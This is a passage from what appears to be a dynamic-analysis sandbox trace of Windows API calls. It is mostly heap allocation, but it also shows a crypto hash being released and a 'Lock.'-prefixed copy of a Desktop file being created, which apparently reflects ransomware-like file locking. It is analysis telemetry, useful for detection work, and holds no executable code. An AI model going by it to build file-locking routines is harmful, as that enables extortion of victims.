(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0166.216] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0166.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0166.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0166.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0166.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0166.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466d90 [0166.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0166.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0166.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0166.217] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0166.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0166.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0166.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.218] CryptDestroyHash (hHash=0xaa55e0) returned 1 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0166.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0166.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0166.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0166.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.220] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0166.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0166.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0166.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0166.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0166.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0166.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/KU9xovkL1lisorTK5X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ku9xovkl1lisortk5x"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.224] GetLastError () returned 0x5 [0166.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0166.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0166.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0166.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0166.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0166.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.KU9xovkL1lisorTK5X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.ku9xovkl1lisortk5x"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0166.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0166.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0166.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0166.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0166.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0166.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.233] RtlAllocateHeap (HeapHandle=0x25c0000, 